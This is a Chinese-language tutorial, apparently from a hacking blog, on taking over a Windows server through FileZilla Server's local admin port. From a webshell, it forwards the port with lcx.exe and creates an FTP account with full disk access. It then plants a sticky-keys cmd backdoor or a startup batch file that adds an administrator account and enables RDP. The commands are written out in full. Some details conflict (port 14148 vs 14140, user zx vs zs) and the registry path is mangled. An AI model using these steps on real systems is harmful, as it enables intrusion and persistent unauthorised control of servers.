介紹
FileZilla是一個免費開源的FTP軟件,分爲客戶端版本和服務器版本,具備所有的FTP軟件功能。可控性、有條理的界面和管理多站點的簡化方式使得Filezilla客戶端版成爲一個方便高效的FTP客戶端工具,而FileZilla Server則是一個小巧並且可靠的支持FTP&SFTP的FTP服務器軟件
Filezilla和普通Web網站一樣,前臺有普通FTP賬戶執行上傳、下載、刪除等動作,後臺則有一個管理員控制檯來設置前臺的賬戶以及賬戶的權限,前臺就是21端口,而後臺默認是14147端口
思路
由於14147端口只能本機127.0.0.1訪問,所以一般情況是沒有密碼的,直接非法連接14147端口,非法登錄遠程的Filezilla,創建一個擁有全部硬盤目錄權限的FTP賬戶
過程
1.菜刀虛擬終端輸入tasklist,查看目標系統運行的軟件裏有FileZilla Server.exe,再輸入netstat -ano查看端口,發現開啓了21端口和14147端口,但是14147只能由127.0.0.1(目標機自己)訪問
2.使用lcx.exe進行端口轉發,將目標機的14147端口轉發到對外開放端口14148
2.1上傳lcx.exe到目標機C:\Windows\Temp\
2.2 菜刀虛擬終端輸入:上傳目錄\lcx.exe -tran 對外開放端口 轉發的ip 要轉發的端口,此時14140端口開啓
C:\Windows\Temp\lcx.exe -tran 14140 127.0.0.1 14147
3.在我們自己的電腦上使用FileZilla Server.exe連接目標機的14140端口
4.創建一個擁有全部硬盤目錄權限的FTP賬戶
流程:創建新用戶--修改密碼--共享C:\所有文件--勾選所有的權限
5.使用ftp連接目標機,登陸剛纔創建的FTP賬號
之後兩種方法
方法1:
6.找到Windows/System32/sethc.exe(屏幕粘滯鍵5次shift彈出),將其改名爲cmd.exe
7.之後使用遠程桌面連接,按5次shift鍵,就會彈出cmd窗口
方法2:
6進入Users/Administrator/AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Startup/
7.利用開機啓動項提權
在該目錄上傳一個bat文件,內容如下:(創建zs用戶,並添加到管理員組,並開啓目標機的3389遠程端口)
net user zx 123.com /add & net localgroup administrators zx /add & REG ADD HKLMSYSTEMCurrentControlSetControlTerminalServer /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
8.目標服務器再次啓動時,1.bat就會執行,zs用戶被創建,並添加到了管理員組裏